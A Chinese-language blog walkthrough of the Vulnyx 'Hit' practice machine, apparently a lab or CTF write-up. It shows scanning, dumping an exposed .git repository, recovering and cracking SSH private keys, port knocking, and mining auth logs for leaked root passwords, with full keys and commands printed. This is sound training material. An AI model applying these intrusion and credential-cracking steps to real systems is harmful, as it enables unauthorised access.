Pepster'Blog
Vulnyx-Hit-Walkthrough
城南花已开 Lv6
  2025-02-04 23:05:46   2025-05-11 17:27:09    6.8k 字  41 分钟  2

信息收集

服务探测

BASH 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1    00:50:56:c0:00:08       (Unknown)
192.168.60.2    00:50:56:e3:f6:57       (Unknown)
192.168.60.176  08:00:27:4e:47:9a       (Unknown)
192.168.60.254  00:50:56:e4:ae:23       (Unknown)

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.978 seconds (129.42 hosts/sec). 4 responded
export ip=192.168.60.176
❯ rustscan -a $ip
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Breaking and entering... into the world of open ports.

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.176:80
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-04 23:06 CST
Initiating ARP Ping Scan at 23:06
Scanning 192.168.60.176 [1 port]
Completed ARP Ping Scan at 23:06, 0.07s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 23:06
Completed Parallel DNS resolution of 1 host. at 23:06, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 23:06
Scanning 192.168.60.176 [1 port]
Discovered open port 80/tcp on 192.168.60.176
Completed SYN Stealth Scan at 23:06, 0.04s elapsed (1 total ports)
Nmap scan report for 192.168.60.176
Host is up, received arp-response (0.00033s latency).
Scanned at 2025-02-04 23:06:13 CST for 0s

PORT   STATE SERVICE REASON
80/tcp open  http    syn-ack ttl 64
MAC Address: 08:00:27:4E:47:9A (Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.30 seconds
           Raw packets sent: 2 (72B) | Rcvd: 2 (72B)

有点反常的是这个靶机竟然没有开放22端口

没事,先看一下有啥信息吧

BASH 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
❯ whatweb -v $ip
WhatWeb report for http://192.168.60.176
Status    : 200 OK
Title     : <None>
IP        : 192.168.60.176
Country   : RESERVED, ZZ

Summary   : HTTPServer[nginx/1.22.1], nginx[1.22.1]

Detected Plugins:
[ HTTPServer ]
        HTTP server header string. This plugin also attempts to
        identify the operating system from the server header.

        String       : nginx/1.22.1 (from server string)

[ nginx ]
        Nginx (Engine-X) is a free, open-source, high-performance
        HTTP server and reverse proxy, as well as an IMAP/POP3
        proxy server.

        Version      : 1.22.1
        Website     : http://nginx.net/

HTTP Headers:
        HTTP/1.1 200 OK
        Server: nginx/1.22.1
        Date: Tue, 04 Feb 2025 15:26:36 GMT
        Content-Type: text/html
        Last-Modified: Mon, 03 Feb 2025 08:36:13 GMT
        Transfer-Encoding: chunked
        Connection: close
        ETag: W/"67a07ffd-ba"
        Content-Encoding: gzip

.git文件泄露

简单扫一下目录,发现存在git仓库的元数据

BASH 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
❯ gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/common.txt -x php,html,zip,txt,md -b 403,404
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.60.176
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/common.txt
[+] Negative Status codes:   403,404
[+] User Agent:              gobuster/3.6
[+] Extensions:              md,php,html,zip,txt
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.git                 (Status: 301) [Size: 169] [--> http://192.168.60.176/.git/]
/.git/HEAD            (Status: 200) [Size: 23]
/.git/config          (Status: 200) [Size: 92]
/.git/index           (Status: 200) [Size: 65]
/.git/logs/           (Status: 200) [Size: 374]
/index.html           (Status: 200) [Size: 186]
/index.html           (Status: 200) [Size: 186]
Progress: 28404 / 28410 (99.98%)
===============================================================
Finished
===============================================================

找到logs,看一下提交了哪些commit

发现用户名charlie以及域名

image

由此.git文件可以拿到很多信息

WangYihang/GitHacker: 🕷️ A .git folder exploiting tool that is able to restore the entire Git repository, including stash, common branches and common tags.

利用githacker获取.git文件夹

BASH 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
❯ githacker --url http://$ip/.git/ --output-folder result
2025-02-04 23:37:49 INFO 1 urls to be exploited
2025-02-04 23:37:49 INFO Exploiting http://192.168.60.176/.git/ into result/7939591a82ab91ad03925b82d15cfa17
2025-02-04 23:37:49 WARNING Trying to detect encoding from a tiny portion of (23) byte(s).
2025-02-04 23:37:49 INFO ascii passed initial chaos probing. Mean measured chaos is 0.000000 %
2025-02-04 23:37:49 INFO ascii should target any language(s) of ['Latin Based']
2025-02-04 23:37:49 INFO ascii is most likely the one. Stopping the process.
2025-02-04 23:37:49 INFO ascii passed initial chaos probing. Mean measured chaos is 0.000000 %
2025-02-04 23:37:49 INFO ascii should target any language(s) of ['Latin Based']
2025-02-04 23:37:49 INFO We detected language [('Dutch', 0.9375), ('French', 0.875), ('English', 0.8125)] using ascii
2025-02-04 23:37:49 INFO ascii is most likely the one. Stopping the process.
2025-02-04 23:37:49 INFO Directory listing enable under: apache
2025-02-04 23:37:49 ERROR /tmp/tmp1xu5p4po/.git/hooks/commit-msg.sample is potential dangerous, skip downloading this file
2025-02-04 23:37:49 ERROR /tmp/tmp1xu5p4po/.git/hooks/applypatch-msg.sample is potential dangerous, skip downloading this file
2025-02-04 23:37:49 ERROR [-1 bytes] -1 .git/hooks/applypatch-msg.sample
2025-02-04 23:37:49 ERROR [-1 bytes] -1 .git/hooks/commit-msg.sample
2025-02-04 23:37:49 ERROR /tmp/tmp1xu5p4po/.git/hooks/fsmonitor-watchman.sample is potential dangerous, skip downloading this file
2025-02-04 23:37:49 ERROR [-1 bytes] -1 .git/hooks/fsmonitor-watchman.sample
2025-02-04 23:37:49 ERROR /tmp/tmp1xu5p4po/.git/hooks/post-update.sample is potential dangerous, skip downloading this file
2025-02-04 23:37:49 ERROR [-1 bytes] -1 .git/hooks/post-update.sample
2025-02-04 23:37:49 ERROR /tmp/tmp1xu5p4po/.git/hooks/pre-applypatch.sample is potential dangerous, skip downloading this file
2025-02-04 23:37:49 ERROR [-1 bytes] -1 .git/hooks/pre-applypatch.sample
2025-02-04 23:37:49 ERROR /tmp/tmp1xu5p4po/.git/hooks/pre-commit.sample is potential dangerous, skip downloading this file
2025-02-04 23:37:49 ERROR [-1 bytes] -1 .git/hooks/pre-commit.sample
2025-02-04 23:37:49 ERROR /tmp/tmp1xu5p4po/.git/hooks/pre-merge-commit.sample is potential dangerous, skip downloading this file
2025-02-04 23:37:49 ERROR [-1 bytes] -1 .git/hooks/pre-merge-commit.sample
2025-02-04 23:37:49 ERROR /tmp/tmp1xu5p4po/.git/hooks/pre-rebase.sample is potential dangerous, skip downloading this file
2025-02-04 23:37:49 ERROR /tmp/tmp1xu5p4po/.git/hooks/pre-push.sample is potential dangerous, skip downloading this file
2025-02-04 23:37:49 ERROR [-1 bytes] -1 .git/hooks/pre-rebase.sample
2025-02-04 23:37:49 ERROR [-1 bytes] -1 .git/hooks/pre-push.sample
2025-02-04 23:37:49 ERROR /tmp/tmp1xu5p4po/.git/hooks/pre-receive.sample is potential dangerous, skip downloading this file
2025-02-04 23:37:49 ERROR [-1 bytes] -1 .git/hooks/pre-receive.sample
2025-02-04 23:37:49 ERROR /tmp/tmp1xu5p4po/.git/hooks/prepare-commit-msg.sample is potential dangerous, skip downloading this file
2025-02-04 23:37:49 ERROR [-1 bytes] -1 .git/hooks/prepare-commit-msg.sample
2025-02-04 23:37:49 ERROR /tmp/tmp1xu5p4po/.git/hooks/push-to-checkout.sample is potential dangerous, skip downloading this file
2025-02-04 23:37:49 ERROR [-1 bytes] -1 .git/hooks/push-to-checkout.sample
2025-02-04 23:37:49 ERROR /tmp/tmp1xu5p4po/.git/hooks/update.sample is potential dangerous, skip downloading this file
2025-02-04 23:37:49 ERROR [-1 bytes] -1 .git/hooks/update.sample
2025-02-04 23:37:49 INFO [240 bytes] 200 .git/info/exclude
2025-02-04 23:37:49 INFO [725 bytes] 200 .git/logs/HEAD
2025-02-04 23:37:49 INFO [725 bytes] 200 .git/logs/refs/heads/master
2025-02-04 23:37:49 INFO [148 bytes] 200 .git/objects/0c/f5be47bae50c4aac01531288e7f71ba4be167c
2025-02-04 23:37:49 INFO [149 bytes] 200 .git/objects/2b/5a7479c36d425981b95982c37b10a34ce11aca
2025-02-04 23:37:49 INFO [149 bytes] 200 .git/objects/30/36160351b1d7eda360bdd3fb8e65d535ad6df1
2025-02-04 23:37:49 INFO [15 bytes] 200 .git/objects/4b/825dc642cb6eb9a060e54bf8d69288fbee4904
2025-02-04 23:37:49 INFO [252 bytes] 200 .git/objects/5c/e5fff468df4e331e05d1f665faffb29632ff42
2025-02-04 23:37:49 INFO [1359 bytes] 200 .git/objects/73/9ad589e33f1e90bd2f1929c82f1037dfc73b09
2025-02-04 23:37:49 INFO [86 bytes] 200 .git/objects/7c/3df59ddda406f09e4e4d36ddbd9d1daf67fda3
2025-02-04 23:37:49 INFO [1981 bytes] 200 .git/objects/7d/19f826926c775d465df62b5f82f66ec9fb7fa1
2025-02-04 23:37:49 ERROR FileExistsError(17, 'File exists')
2025-02-04 23:37:49 INFO [150 bytes] 200 .git/objects/7d/ff168ec5d2174eae9a7ff7f4d1d87080a6c726
2025-02-04 23:37:49 INFO [253 bytes] 200 .git/objects/94/9429787b70fbcfc3816c0ba158ee2c83bb9f66
2025-02-04 23:37:49 INFO [86 bytes] 200 .git/objects/99/dd10f9077a951497d8a76305a3c4e26adb31ff
2025-02-04 23:37:49 INFO [121 bytes] 200 .git/objects/9c/a5eedec55e3c900f8685460aa4ce605f3d8472
2025-02-04 23:37:49 INFO [86 bytes] 200 .git/objects/a7/685af0a6c8f0ecae7cd44159f3a6ceab3625d7
2025-02-04 23:37:49 INFO [149 bytes] 200 .git/objects/a9/980936fd3d509433e9862e9021aa5fb13351ac
2025-02-04 23:37:49 ERROR FileExistsError(17, 'File exists')
2025-02-04 23:37:49 INFO [1982 bytes] 200 .git/objects/a9/d7d7d4c39d4335d1529d5f78dd621695761b5a
2025-02-04 23:37:49 ERROR FileExistsError(17, 'File exists')
2025-02-04 23:37:49 ERROR FileExistsError(17, 'File exists')
2025-02-04 23:37:49 INFO [41 bytes] 200 .git/refs/heads/master
2025-02-04 23:37:49 INFO [10 bytes] 200 .git/COMMIT_EDITMSG
2025-02-04 23:37:49 INFO [23 bytes] 200 .git/HEAD
2025-02-04 23:37:49 ERROR /tmp/tmp1xu5p4po/.git/config is potential dangerous, skip downloading this file
2025-02-04 23:37:49 ERROR [-1 bytes] -1 .git/config
2025-02-04 23:37:49 ERROR FileExistsError(17, 'File exists')
2025-02-04 23:37:49 ERROR FileExistsError(17, 'File exists')
2025-02-04 23:37:49 INFO [73 bytes] 200 .git/description
2025-02-04 23:37:49 INFO [65 bytes] 200 .git/index
2025-02-04 23:37:49 INFO Cloning downloaded repo from /tmp/tmp1xu5p4po to result/7939591a82ab91ad03925b82d15cfa17
2025-02-04 23:37:49 ERROR Cloning into 'result/7939591a82ab91ad03925b82d15cfa17'...
done.
2025-02-04 23:37:49 INFO Check it out: result/7939591a82ab91ad03925b82d15cfa17
2025-02-04 23:37:49 INFO 1 / 1 were exploited successfully
2025-02-04 23:37:49 INFO http://192.168.60.176/.git/ -> result/7939591a82ab91ad03925b82d15cfa17
cd result
ls -al
total 12
drwxr-xr-x  3 Pepster Pepster 4096 Feb  4 23:37 .
drwxr-xr-x 10 Pepster Pepster 4096 Feb  4 23:37 ..
drwxr-xr-x  3 Pepster Pepster 4096 Feb  4 23:37 7939591a82ab91ad03925b82d15cfa17
cd 7939591a82ab91ad03925b82d15cfa17
ls -al
total 12
drwxr-xr-x 3 Pepster Pepster 4096 Feb  4 23:37 .
drwxr-xr-x 3 Pepster Pepster 4096 Feb  4 23:37 ..
drwxr-xr-x 8 Pepster Pepster 4096 Feb  4 23:38 .git
❯ git reflog
9ca5eed (HEAD -> master) HEAD@{0}: reset: moving to 9ca5eed
2b5a747 (origin/master, origin/HEAD, ls) HEAD@{1}: reset: moving to 2b5a
2b5a747 (origin/master, origin/HEAD, ls) HEAD@{2}: reset: moving to HEAD
2b5a747 (origin/master, origin/HEAD, ls) HEAD@{3}: commit: Commit #5
7dff168 HEAD@{4}: commit: Commit #4
a998093 HEAD@{5}: commit: Commit #3
0cf5be4 HEAD@{6}: commit: Commit #2
9ca5eed (HEAD -> master) HEAD@{7}: commit (initial): Commit #1
❯ git reset --hard 9ca5eed
HEAD is now at 9ca5eed Commit #1
ls
id_rsa  knockd.conf
cat id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
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
RcXCLT2EU2tO0AAAAJcm9vdEBrYWxpAQI=
-----END OPENSSH PRIVATE KEY-----

从第一次commit中得到了私钥文件,但问题是这个靶机压根就没开放22端口,没法ssh登录

除了私钥文件外还有一个配置文件knockd.conf

BASH 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
cat knockd.conf
[options]
        UseSyslog

[openSSH]
        sequence    = 7000,8000,9000
        seq_timeout = 5
        command     = /sbin/iptables -A INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
        tcpflags    = syn

[closeSSH]
        sequence    = 9000,8000,7000
        seq_timeout = 5
        command     = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
        tcpflags    = syn

[openHTTPS]
        sequence    = 12345,54321,24680,13579
        seq_timeout = 5
        command     = /usr/local/sbin/knock_add -i -c INPUT -p tcp -d 443 -f %IP%
        tcpflags    = syn

GPT了一下,发现是涉及敲门配置,当端口按顺序收到请求后会执行command中的操作添加防火墙配置和开启htts之类的操作

然后在a998093commit中发现了新的私钥文件以及knockd.conf配置

BASH 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
cat id_rsa
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,3E2B3558346EF63A

6ba1VKUz/cNss0/xw7FkmsfiG15ExhqArUxI7WCfiFKNaeuSdUNETexm38BmeC/b
kmKErTAVzIpCtzCxXYEO8wOOyJRJEZGHNqtoq6bgrxcZaJfzONc1EM6aEIfQS+Ks
zloh5Ye8FygCkU2bCSYnaLwyHuGUcJ72Oa+8jYJtsvr1Gd+z0CWJapRodsYnlvep
5EGx+jaYDkOG3VEtvjfPvA+pezHPifDsLr03JNuGb4awvpTGoRqXjXSYSfKOKimy
Jpip4JVxit3T9aaOu1wF5UIExRtTG9lj38Mb1H2zXENcONIX5nAPoacvvZtCp9iz
20qafBdLgnvZF0sy9GEvjouXPNeAk/c19qTvAu6lSsQq0NliIcozN8tLyvNHUjPv
s/BptewE2NK0YvkNNCNhTilVMPaaojhf8zIVqNeH3L99GBUjigNdd2kqYzX4CjG/
7W8WLhl8gPDeM7eI+Tc94dRRopDfQxMkl/ZhpecXTQQj8Ay8kdSJ+788geA2ySUe
eeeBZ2XZk1X73yoqE1n7mQfvoJwtQWsCATQvMZrVlAJv5XYzIQrtKsGmfv18FehN
TosfUBrvqprm2093NHqgKsgZy12reQt8ZnQiusWiY4ozOQxLJnn6SnE2pSkNhOTj
3Zi8x1WCH6qSOKREBnOZjWZJm4J8UgfqU3CpXKLaYDwPSSVjdHHX2D8m0yypxZGb
7yP27mDSEgm2NxKbbesfEehqA+U3HvJClq9dgXYK14Phj6DRO8xDLBsP3GdlzZSB
g2gIObMasB7lJl1zpre0FgP/Ee98xYwFSvu6nuHvfaEC++XXjJBI9xnAe23Bmlam
7MIuk2eD+3R39skT5Sh5B8O/N2geMXL2G08QOLw5Yr5zvi8nNw1CkCO9saRf5x0x
cfQfTQjGzwC/V0JvNtCZg8FDUlXeqoAd/skbZAmLNiFaNwQ2irOQmZvdmH/Zp23X
HDKecWcpLhaa9xbbua84QMoP2lDm4NFLbPPxkG35kCW0qKGymWmqlZhkDiVoBdUJ
psubanx2bCiCDHSoPGJq/4WW9agBuHd9POP3f1OJtDsgesJrZTUewomSDv5Vc039
1PZI8qYCJIgojtlB0A7HFf/fJGSUjm5OmomDLi18HnTg6SiiEnmKtBtI7RkVkGSc
6l+8RgddRFRY7/SmLUqEtLcgjjqFqT1yeKZAFxpGVxJh3c9eY0KNDbbnksPxV6B/
Ogop0/2UWyQSudzhuDmPuXTHA8ZCohhl3S1RKzp0vnvZGyd83wbk427YrImnUqBh
jMvFoMe664v6NwCvGk0H4oT5pz8guPH7EhnNGAYHQ65JtiAmn60fqqjF11mPN2mG
z08EKhIsUZcYzl6zXelvKtI8oCPay7DAVh2YUVTCuXO0+ulaCrbhC4imvFTZflqP
V1DUAhrK0WhvT97rnh7yI3cAO24Kp3dI0on7wB7OxV0NhbzypT3V9IJmOBbgXWW9
TCG+r1FGBHQ6ywjmAeIGF3iui1MnU/TRbY7Zs0sqMZ3iT2jF8qNmfl0YhRtgXM9+
o82sn1CEU4rITslU3qUHA5/yiFVRPuL48mbjTNbkLvzFfMQ/3ePdhg==
-----END RSA PRIVATE KEY-----
cat knockd.conf
[options]
        LogFile = /var/log/knockd.log

[openSSH]
        sequence    = 65535,8888,54111
        seq_timeout = 1
        command     = /usr/sbin/service ssh start
        tcpflags    = syn

我们先尝试一些能否开启ssh服务的请求

我利用nmap对序列的端口依次进行扫描

触发了响应开启ssh服务的请求

BASH 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
❯ nmap -p 65535,8888,54111 $ip
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-04 23:57 CST
Nmap scan report for hit.nyx (192.168.60.176)
Host is up (0.00075s latency).

PORT      STATE  SERVICE
8888/tcp  closed sun-answerbook
54111/tcp closed unknown
65535/tcp closed unknown
MAC Address: 08:00:27:4E:47:9A (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 0.28 seconds
❯ rustscan -a $ip
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
😵 https://admin.tryhackme.com

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.176:22
Open 192.168.60.176:80
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-04 23:57 CST
Initiating ARP Ping Scan at 23:57
Scanning 192.168.60.176 [1 port]
Completed ARP Ping Scan at 23:57, 0.07s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 23:57
Scanning hit.nyx (192.168.60.176) [2 ports]
Discovered open port 22/tcp on 192.168.60.176
Discovered open port 80/tcp on 192.168.60.176
Completed SYN Stealth Scan at 23:57, 0.04s elapsed (2 total ports)
Nmap scan report for hit.nyx (192.168.60.176)
Host is up, received arp-response (0.00064s latency).
Scanned at 2025-02-04 23:57:28 CST for 0s

PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 64
80/tcp open  http    syn-ack ttl 64
MAC Address: 08:00:27:4E:47:9A (Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.28 seconds
           Raw packets sent: 3 (116B) | Rcvd: 3 (116B)

尝试利用a998093 commit中的id_rsa登录

发现私钥加密了

爆破一下

用户提权

成功登录

BASH 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
❯ ssh2john id_rsa >hash
❯ john hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
Cost 2 (iteration count) is 2 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
charlie1         (id_rsa)
1g 0:00:00:00 DONE (2025-02-05 00:00) 14.28g/s 10057p/s 10057c/s 10057C/s batista..nichole
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
❯ ssh charlie@$ip -i id_rsa
Enter passphrase for key 'id_rsa':
charlie@hit:~$ cat user.txt
21744d4a65af82ac691cb3381c033d37

Root提权

再次信息收集一下

发现用户隶属于adm用户组中

可以查看日志等相关信息

1
2
3
charlie@hit:~$ id
uid=1000(charlie) gid=1000(charlie) grupos=1000(charlie),4(adm)

靶机上wget也没有curl也没有,真是干净啊

好在有busybox

传了给llinpeas上去,没啥收获,那就只能在日志这下手了

BASH 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
charlie@hit:/var/log$ grep -Pinr "pass" . |grep -v "access.log"
./auth.log:2:2025-02-03T09:49:56.742982+01:00 hit sshd[665]: Accepted password for charlie from 192.168.1.10 port 46372 ssh2
./auth.log:14:2025-02-03T09:50:23.932694+01:00 hit sshd[691]: Accepted password for root from 192.168.1.10 port 51268 ssh2
./auth.log:24:2025-02-03T09:50:54.780164+01:00 hit sshd[701]: pam_unix(sshd:auth): check pass; user unknown
./auth.log:26:2025-02-03T09:50:56.693974+01:00 hit sshd[701]: Failed password for invalid user r00tP4zzw0rd from 192.168.1.10 port 45796 ssh2
./auth.log:27:2025-02-03T09:50:59.412534+01:00 hit sshd[701]: pam_unix(sshd:auth): check pass; user unknown
./auth.log:28:2025-02-03T09:51:01.010590+01:00 hit sshd[701]: Failed password for invalid user r00tP4zzw0rd from 192.168.1.10 port 45796 ssh2
./auth.log:31:2025-02-03T09:51:03.164492+01:00 hit sshd[701]: pam_unix(sshd:auth): check pass; user unknown
./auth.log:32:2025-02-03T09:51:04.978253+01:00 hit sshd[701]: Failed password for invalid user r00tP4zzw0rd from 192.168.1.10 port 45796 ssh2
./auth.log:35:2025-02-03T09:51:26.125143+01:00 hit sshd[712]: Accepted password for root from 192.168.1.10 port 39662 ssh2
